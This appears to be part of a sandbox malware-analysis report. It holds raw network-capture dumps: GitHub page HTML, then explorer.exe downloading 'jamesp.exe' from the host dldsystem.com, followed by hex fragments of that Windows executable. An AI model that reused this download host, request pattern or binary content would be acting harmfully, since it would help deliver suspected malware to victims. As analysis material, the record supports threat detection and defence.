                                                                                                                                  2022-10-17 20:07:12 UTC638INData Raw: 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 33 20 66 6c 65 78 2d 73 65 6c 66 2d 73 74 61 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 2f 63 6f 6d 70 61 6e 79 2f 67 69 74 68 75 62 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 4c 69 6e 6b 65 64 69 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 6c 69 6e 6b 65 64 69 6e 26 71 75 6f 74 3b 7d 22
                                                                                                                                  Data Ascii: <li class="mr-3 flex-self-start"> <a href="https://www.linkedin.com/company/github" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Linkedin&quot;,&quot;label&quot;:&quot;text:linkedin&quot;}"
                                                                                                                                  2022-10-17 20:07:12 UTC639INData Raw: 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 73 69 74 65 2f 69 63 6f 6e 73 2f 66 6f 6f 74 65 72 2f 74 77 69 74 63 68 2e 73 76 67 22 20 77 69 64 74 68 3d 22 31 38 22 20 68 65 69 67 68 74 3d 22 31 38 22 20 20 63 6c 61 73 73 3d 22 64 2d 62 6c 6f 63 6b 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 61 6c 74 3d 22 54 77 69 74 63 68 20 69 63 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 47 69 74 48 75 62 20 6f 6e 20 54 77 69 74 63 68 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e
                                                                                                                                  Data Ascii: "https://github.githubassets.com/images/modules/site/icons/footer/twitch.svg" width="18" height="18" class="d-block" loading="lazy" decoding="async" alt="Twitch icon"> <span class="sr-only">GitHub on Twitch</span> </a> </li>
                                                                                                                                  2022-10-17 20:07:12 UTC640INData Raw: 6e 6f 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 77 72 61 70 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 26 63 6f 70 79 3b 20 32 30 32 32 20 47 69 74 48 75 62 2c 20 49 6e 63 2e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 65 6e 2f 67 69 74 68 75 62 2f 73 69 74 65 2d 70 6f 6c 69 63 79 2f 67 69 74 68 75 62 2d 74 65 72 6d 73 2d 6f 66 2d 73 65 72 76 69 63 65 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26
                                                                                                                                  Data Ascii: none d-flex flex-wrap color-fg-muted"> <li class="mr-3"> &copy; 2022 GitHub, Inc. </li> <li class="mr-3"> <a href="https://docs.github.com/en/github/site-policy/github-terms-of-service" data-analytics-event="{&
                                                                                                                                  2022-10-17 20:07:12 UTC642INData Raw: 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 0a 0a 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 6a 61 78 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 20 63 6c 61 73 73 3d 22 61 6a 61 78 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 66 6c 61 73 68 20 66 6c 61 73 68 2d 65 72 72 6f 72 22 20 68 69 64 64 65 6e 3e 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72
                                                                                                                                  Data Ascii: a> </li> </ul> </div> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="tr
                                                                                                                                  2022-10-17 20:07:12 UTC643INData Raw: 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 38 2e 32 32 20 31 2e 37 35 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 34 34 20 30 4c 31 2e 36 39 38 20 31 33 2e 31 33 32 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 32 2e 33 36 38 68 31 32 2e 31 36 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 32 2d 2e 33 36 38 4c 38 2e 32 32 20 31 2e 37 35 34 7a 6d 2d 31 2e 37 36 33 2d 2e 37 30 37 63 2e 36 35 39 2d 31 2e 32 33 34 20 32 2e 34 32 37 2d 31 2e 32 33 34 20 33 2e 30 38 36 20 30 6c 36 2e 30 38 32 20 31 31 2e 33 37 38 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 31 34 2e
                                                                                                                                  Data Ascii: component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.
                                                                                                                                  2022-10-17 20:07:12 UTC644INData Raw: 64 3d 22 4d 33 2e 37 32 20 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 4c 38 20 36 2e 39 34 6c 33 2e 32 32 2d 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 36 20 31 2e 30 36 4c 39 2e 30 36 20 38 6c 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 4c 38 20 39 2e 30 36 6c 2d 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 4c 36 2e 39 34 20 38 20 33 2e 37 32 20 34 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 63 74 6f 63 61 74 2d 73 70 69 6e 6e 65 72 20 6d 79 2d 36
                                                                                                                                  Data Ascii: d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6
                                                                                                                                  2022-10-17 20:07:12 UTC646INData Raw: 32 31 36 20 30 20 31 36 20 2e 37 38 34 20 31 36 20 31 2e 37 35 76 37 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 31 34 2e 32 35 20 31 31 68 2d 37 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 35 20 39 2e 32 35 76 2d 37 2e 35 7a 6d 31 2e 37 35 2d 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 37 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 37 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30
                                                                                                                                  Data Ascii: 216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.549708162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:16 UTC646OUTGET /jamesp.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: dldsystem.com
                                                                                                                                  2022-10-17 20:07:17 UTC646INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:16 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 20:01:04 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 418816
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-10-17 20:07:17 UTC647INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 2e 52 17 91 4f 3c 44 91 4f 3c 44 91 4f 3c 44 85 24 3f 45 9c 4f 3c 44 85 24 39 45 37 4f 3c 44 85 24 38 45 87 4f 3c 44 85 24 3d 45 92 4f 3c 44 91 4f 3d 44 cd 4f 3c 44 f1 35 38 45 80 4f 3c 44 f1 35 3f 45 87 4f 3c 44 f1 35 39 45 dc 4f 3c 44 f5 35 35 45 90 4f 3c 44 f5 35 3e 45 90 4f 3c 44 52 69 63 68 91 4f 3c 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$.RO<DO<DO<D$?EO<D$9E7O<D$8EO<D$=EO<DO=DO<D58EO<D5?EO<D59EO<D55EO<D5>EO<DRichO<DPEL
                                                                                                                                  2022-10-17 20:07:17 UTC654INData Raw: 83 ff 10 89 75 e0 8d 45 d0 0f 43 45 d0 c6 04 30 00 eb 43 8b 4d e4 8b fe 89 c8 2b fa 2b c2 3b f8 77 21 89 75 e0 83 f9 10 8d 75 d0 0f 43 75 d0 57 03 f2 6a 00 56 e8 6f 67 00 00 83 c4 0c c6 04 3e 00 eb 13 6a 00 57 c6 45 cc 00 8d 4d d0 ff 75 cc 57 e8 a3 26 00 00 83 7d e4 10 8d 7d d0 f2 0f 10 45 1c 0f 43 7d d0 83 ec 08 8b 45 c0 8b 75 e0 f2 0f 11 04 24 ff 75 c4 ff 70 14 8d 45 e8 6a 4c 50 ff 75 bc e8 c1 16 00 00 83 c4 10 50 56 57 e8 96 e5 ff ff 83 7d e4 10 8d 4d d0 8b 75 b8 0f 43 4d d0 50 51 ff 75 18 ff 75 c0 ff 75 10 ff 75 0c 56 ff 75 bc e8 41 12 00 00 8b 4d e4 83 c4 38 83 f9 10 72 28 8b 55 d0 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 29 51 52 e8 6f 4f 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd
                                                                                                                                  Data Ascii: uECE0CM++;w!uuCuWjVog>jWEMuW&}}EC}Eu$upEjLPuPVW}MuCMPQuuuuVuAM8r(UArP#+w)QRoOMdY_^M3
                                                                                                                                  2022-10-17 20:07:17 UTC662INData Raw: 35 42 00 64 a1 00 00 00 00 50 83 ec 08 56 a1 18 20 43 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 8b 06 8b 40 04 8b 44 30 30 8b 48 04 89 4d f0 8b 01 ff 50 04 8d 45 ec c7 45 fc 00 00 00 00 50 e8 53 fb ff ff 83 c4 04 89 c1 8b 10 6a 0a 8b 42 20 ff d0 c7 45 fc ff ff ff ff 8b 4d f0 88 45 08 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 8b c8 6a 01 ff 12 ff 75 08 8b ce e8 b9 0a 00 00 8b ce e8 92 f8 ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 55 8b ec 6a ff 68 04 36 42 00 64 a1 00 00 00 00 50 83 ec 48 a1 18 20 43 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 5d 08 8d 4d e8 6a 00 89 5d ec e8 7d 0d 00 00 c7 45 fc 00 00 00 00 8b 3d 14 65 46 00 a1 04 65 46 00 89 45 e0 85 ff 75 2f 57 8d 4d e4 e8 5b 0d 00 00 39 3d 14 65 46 00 75 10 a1
                                                                                                                                  Data Ascii: 5BdPV C3PEdu@D00HMPEEPSjB EMEtPtjuMdY^]Ujh6BdPH C3ESVWPEd]Mj]}E=eFeFEu/WM[9=eFu
                                                                                                                                  2022-10-17 20:07:17 UTC670INData Raw: 14 8b 07 53 8b 70 10 8b ce ff 15 38 41 42 00 8b cf ff d6 8b c3 5e 5b 5f c3 83 c8 ff c3 55 8b ec 51 8b 45 10 53 8b d9 57 8b 7d 0c 85 c0 7f 0f 7c 04 85 ff 75 09 33 c0 33 d2 e9 c1 00 00 00 83 7b 38 00 74 0f 50 57 ff 75 08 e8 b7 00 00 00 e9 ac 00 00 00 8b 43 1c 56 8b f7 8b 08 85 c9 74 3b 8b 43 2c 8b 00 89 45 fc 85 c0 74 2f 3b c7 72 05 8b c7 89 7d fc 50 51 ff 75 08 e8 2b 23 00 00 8b 4d fc 83 c4 0c 8b 45 08 2b f1 03 c1 89 45 fc 8b 43 2c 29 08 8b 43 1c 01 08 eb 06 8b 45 08 89 45 fc 83 7b 4c 00 74 4e 8b cb e8 e5 f7 ff ff 8b 4d fc 8b d6 b8 ff 0f 00 00 3b f0 76 24 ff 73 4c 50 6a 01 51 e8 73 78 00 00 8b 4d fc 2b f0 03 c8 83 c4 10 89 4d fc 8b d6 3d ff 0f 00 00 75 17 eb d3 85 d2 74 11 ff 73 4c 56 6a 01 51 e8 4b 78 00 00 83 c4 10 2b f0 8b 55 10 2b fe 8b c7 83 da 00 5e
                                                                                                                                  Data Ascii: Sp8AB^[_UQESW}|u33{8tPWuCVt;C,Et/;r}PQu+#ME+EC,)CEE{LtNM;v$sLPjQsxM+M=utsLVjQKx+U+^
                                                                                                                                  2022-10-17 20:07:17 UTC678INData Raw: 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d f8 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 02 ef ff ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 9f 2c 00 00 83 c4 20 5e 5d c3 55 8b ec 8b 4d 0c 56 8b 75 08 89 0e e8 a3 23 00 00 8b 48 24 89 4e 04 e8 98 23 00 00 89 70 24 8b c6 5e 5d c3 55 8b ec 56 e8 87 23 00 00 8b 75 08 3b 70 24 75 0e 8b 76 04 e8 77 23 00 00 89 70 24 5e 5d c3 e8 6c 23 00 00 8b 48 24 83 c1 04 eb 07 3b f0 74 0b 8d 48 04 8b 01 85 c0 74 09 eb f1 8b 46 04 89 01 eb da e8 a1 6c 00 00 cc 55 8b ec 51 53 fc 8b 45 0c 8b 48 08 33 4d 0c e8 63 ee ff ff 8b 45 08 8b 40 04 83 e0 66 74 11 8b 45 0c c7 40 24 01 00 00 00 33 c0 40 eb 6c eb 6a 6a 01 8b 45 0c ff 70 18
                                                                                                                                  Data Ascii: E@MAd=];d_^[UVuN3jVvvjuvu, ^]UMVu#H$N#p$^]UV#u;p$uvw#p$^]l#H$;tHtFlUQSEH3McE@ftE@$3@ljjEp
                                                                                                                                  2022-10-17 20:07:17 UTC686INData Raw: b6 42 f4 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e5 f4 ff ff 8b 46 f5 3b 42 f5 0f 84 87 00 00 00 0f b6 c8 0f b6 42 f5 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 b8 f4 ff ff 0f b6 4e f6 0f b6 42 f6 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 96 f4 ff ff 0f b6 4e f7 0f b6 42 f7 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 74 f4 ff ff 0f b6 4e f8 0f b6 42 f8 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 52 f4 ff ff 8b 46 f9 3b 42 f9 0f 84 01 f8 ff ff 0f b6 42 f9 0f b6 4e f9 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 24 f4 ff ff 0f b6 4e fa 0f b6 42 fa 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 02 f4 ff
                                                                                                                                  Data Ascii: B+t3EF;BB+t3ENB+t3ENB+t3EtNB+t3ERF;BBN+t3E$NB+t3E
                                                                                                                                  2022-10-17 20:07:17 UTC693INData Raw: 45 fc 3b 47 10 72 07 89 47 10 b0 01 eb 02 32 c0 83 3e 00 75 06 85 db 74 02 89 1e 5f 5e 5b c9 c2 04 00 8b ff 53 56 8b f1 8d 8e 48 04 00 00 e8 dd 0a 00 00 84 c0 74 1b 33 db 39 5e 10 0f 85 c8 00 00 00 e8 8d 2e 00 00 c7 00 16 00 00 00 e8 78 0f 00 00 83 c8 ff 5e 5b c3 89 5e 38 89 5e 1c e9 85 00 00 00 ff 46 10 39 5e 18 0f 8c 8c 00 00 00 ff 76 1c 0f b6 46 31 8b ce 50 e8 8c fe ff ff 89 46 1c 83 f8 08 74 bc 83 f8 07 77 c7 ff 24 85 6d c8 40 00 8b ce e8 ea 00 00 00 eb 45 83 4e 28 ff 89 5e 24 88 5e 30 89 5e 20 89 5e 2c 88 5e 3c eb 38 8b ce e8 8f 00 00 00 eb 27 8b ce e8 16 05 00 00 eb 1e 89 5e 28 eb 21 8b ce e8 62 01 00 00 eb 10 8b ce e8 7f 01 00 00 eb 07 8b ce e8 c4 02 00 00 84 c0 0f 84 6a ff ff ff 8b 46 10 8a 00 88 46 31 84 c0 0f 85 6b ff ff ff ff 46 10 8b ce e8 29
                                                                                                                                  Data Ascii: E;GrG2>ut_^[SVHt39^.x^[^8^F9^vF1PFtw$m@EN(^$^0^ ^,^<8'^(!bjFF1kF)
                                                                                                                                  2022-10-17 20:07:17 UTC701INData Raw: 48 04 83 60 08 00 89 08 8b 45 08 8b 40 0c 90 c1 e8 02 a8 01 8b 45 08 74 0b 6a fc 59 83 c0 0c f0 21 08 eb 23 8b 40 0c 90 83 e0 41 3c 41 75 18 8b 45 08 8b 40 0c 90 c1 e8 08 a8 01 75 0a 8b 45 08 c7 40 18 00 02 00 00 8b 45 08 8b 40 10 90 56 57 53 50 e8 4e 9a 00 00 23 c2 83 c4 10 83 f8 ff 75 04 0b c0 eb 02 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a8 fd ff ff 83 c4 10 5d c3 6a 0c 68 40 13 43 00 e8 b6 9d ff ff 83 65 e4 00 8b 45 08 ff 30 e8 76 f2 ff ff 59 83 65 fc 00 8b 4d 0c e8 34 00 00 00 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 17 00 00 00 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 75 e4 8b 45 10 ff 30 e8 4b f2 ff ff 59 c3 8b ff 55 8b ec 51 56 8b f1 57 8b 06 8b 38 57 e8 8b 62 00 00 88 45 fc 8b 06 ff 30 8b 46
                                                                                                                                  Data Ascii: H`E@EtjY!#@A<AuE@uE@E@VWSPN#u3_^[]Uuuuu]jh@CeE0vYeM4uEMdY_^[uE0KYUQVW8WbE0F
                                                                                                                                  2022-10-17 20:07:17 UTC709INData Raw: 65 e8 e8 d9 24 00 00 cc 8b ff 55 8b ec 33 c0 81 7d 08 63 73 6d e0 0f 94 c0 5d c3 8b ff 55 8b ec 83 ec 18 83 7d 10 00 75 12 e8 93 00 00 00 84 c0 74 09 ff 75 08 e8 ca 00 00 00 59 8d 45 0c c6 45 ff 00 89 45 e8 8d 4d fe 8d 45 10 89 45 ec 8d 45 ff 6a 02 89 45 f0 58 89 45 f8 89 45 f4 8d 45 f8 50 8d 45 e8 50 8d 45 f4 50 e8 54 fe ff ff 83 7d 10 00 74 02 c9 c3 ff 75 08 e8 01 00 00 00 cc 8b ff 55 8b ec e8 5d a3 00 00 83 f8 01 74 20 64 a1 30 00 00 00 8b 40 68 c1 e8 08 a8 01 75 10 ff 75 08 ff 15 4c 40 42 00 50 ff 15 50 40 42 00 ff 75 08 e8 4e 00 00 00 59 ff 75 08 ff 15 a0 40 42 00 cc 6a 00 ff 15 3c 40 42 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0
                                                                                                                                  Data Ascii: e$U3}csm]U}utuYEEEMEEEjEXEEEPEPEPT}tuU]t d0@huuL@BPP@BuNYu@Bj<@Bt4MZf9u*H<9PEuf9Auytvt
                                                                                                                                  2022-10-17 20:07:17 UTC717INData Raw: 85 f4 fd ff ff 50 e8 0e 6f ff ff 33 c9 83 c4 0c 85 c0 0f 94 c1 eb 06 8b 8d 44 fd ff ff 89 4e 04 8b 47 08 89 06 8b 46 04 89 47 18 eb 1e 83 fb 01 75 0b 8b 85 38 fd ff ff 89 47 10 eb 0e 83 fb 05 75 09 8b 85 38 fd ff ff 89 47 14 6b c3 0c 57 8b b0 90 75 42 00 8b ce ff 15 38 41 42 00 ff d6 59 8b 8d 34 fd ff ff 85 c0 74 4a 8b 85 3c fd ff ff 89 0c 38 ff b4 9f a0 00 00 00 e8 a9 0f 00 00 8b 8d 30 fd ff ff 8b 85 20 fd ff ff 51 89 84 9f a0 00 00 00 e8 90 0f 00 00 8b 85 1c fd ff ff 59 59 89 47 08 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 4c 52 ff ff c9 c3 81 f9 58 22 43 00 74 4a 8b f3 83 c9 ff 03 f6 8b 44 f7 28 f0 0f c1 08 75 39 ff 74 f7 28 e8 52 0f 00 00 ff 74 f7 24 e8 49 0f 00 00 ff b4 9f a0 00 00 00 e8 3d 0f 00 00 8b 85 3c fd ff ff 83 c4 0c 8b 8d 44 fd ff ff 89 0c 38 89 8c
                                                                                                                                  Data Ascii: Po3DNGFGu8Gu8GkWuB8ABY4tJ<80 QYYG3M_^3[LRX"CtJD(u9t(Rt$I=<D8
                                                                                                                                  2022-10-17 20:07:17 UTC725INData Raw: 04 83 7d 18 02 75 14 80 39 30 75 0f 6a 03 8d 41 01 50 51 e8 d1 48 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 45 f0 83 a0 50 03 00 00 fd 33 c0 e9 f5 fe ff ff 33 c0 50 50 50 50 50 e8 b9 92 ff ff cc 8b ff 55 8b ec 83 ec 0c 33 c0 56 57 ff 75 18 8d 7d f4 ff 75 14 ab ab ab 8d 45 f4 8b 7d 1c 50 8b 45 08 57 ff 70 04 ff 30 e8 c1 a9 00 00 83 c9 ff 83 c4 18 8b d0 39 4d 10 74 0e 8b 4d 10 33 c0 83 7d f4 2d 0f 94 c0 2b c8 ff 75 24 8b 75 0c 8d 45 f4 52 50 8b 45 f8 03 c7 50 33 c0 83 7d f4 2d 51 0f 94 c0 03 c6 50 e8 a7 a8 00 00 83 c4 18 85 c0 74 05 c6 06 00 eb 16 ff 75 20 8d 45 f4 6a 00 50 57 ff 75 10 56 e8 07 00 00 00 83 c4 18 5f 5e c9 c3 8b ff 55 8b ec 83 ec 14 8d 4d ec 53 56 57 ff 75 1c e8 d1 7f ff ff 8b 5d 14 33 d2 8b 75 10 8b 7d 08 8b 4b 04 49 38 55 18 74 14 3b ce 75 10 33
                                                                                                                                  Data Ascii: }u90ujAPQH}tEP33PPPPPU3VWu}uE}PEWp09MtM3}-+u$uERPEP3}-QPtu EjPWuV_^UMSVWu]3u}KI8Ut;u3
                                                                                                                                  2022-10-17 20:07:17 UTC732INData Raw: ff ff ff 8d 8d 74 ff ff ff 89 7d cc 0f 94 c0 40 51 50 89 45 dc 8d 45 cc 50 8d 45 b8 50 e8 a5 87 00 00 83 c4 10 83 f8 ff 0f 84 af 01 00 00 8b 75 d4 4f 03 fe eb 7f 8a 54 01 2d f6 c2 04 74 1e 8a 44 01 2e 80 e2 fb 88 45 ec 8a 07 88 45 ed 8b 45 d4 6a 02 88 54 01 2d 8d 45 ec 50 eb 43 8a 07 88 45 e3 e8 49 8b ff ff 0f b6 4d e3 66 39 1c 48 7d 2c 8d 47 01 89 45 cc 3b 45 a4 0f 83 31 01 00 00 6a 02 8d 45 b8 57 50 e8 10 d3 ff ff 83 c4 0c 83 f8 ff 0f 84 45 01 00 00 8b 7d cc eb 18 6a 01 57 8d 45 b8 50 e8 f3 d2 ff ff 83 c4 0c 83 f8 ff 0f 84 28 01 00 00 53 53 6a 05 8d 45 e4 47 50 ff 75 dc 8d 45 b8 89 7d 9c 50 53 ff 75 88 e8 73 42 00 00 83 c4 20 89 45 cc 85 c0 0f 84 fe 00 00 00 53 8d 4d a0 51 50 8d 45 e4 50 ff 75 94 ff 15 b0 40 42 00 85 c0 0f 84 da 00 00 00 8b 75 b0 2b 75
                                                                                                                                  Data Ascii: t}@QPEEPEPuOT-tD.EEEjT-EPCEIMf9H},GE;E1jEWPE}jWEP(SSjEGPuE}PSusB ESMQPEPu@Bu+u
